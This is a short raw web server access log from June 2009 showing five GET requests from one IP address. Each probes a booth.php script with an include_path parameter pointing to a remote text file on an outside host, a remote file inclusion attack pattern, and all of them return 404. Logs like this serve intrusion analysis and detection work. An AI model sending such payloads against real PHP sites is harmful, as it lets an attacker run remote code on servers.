219.85.63.226 - - [19/Jun/2009:04:55:20 -0400] "GET /logs/access_log.Q109051800//booth.php?include_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [19/Jun/2009:04:55:20 -0400] "GET /logs//booth.php?include_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.85.63.226 - - [19/Jun/2009:04:55:20 -0400] "GET /logs//booth.php?include_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.85.63.226 - - [19/Jun/2009:04:55:20 -0400] "GET /logs/access_log.Q109051800//booth.php?include_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [19/Jun/2009:04:55:27 -0400] "GET /logs/access_log.Q109051800//booth.php?include_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
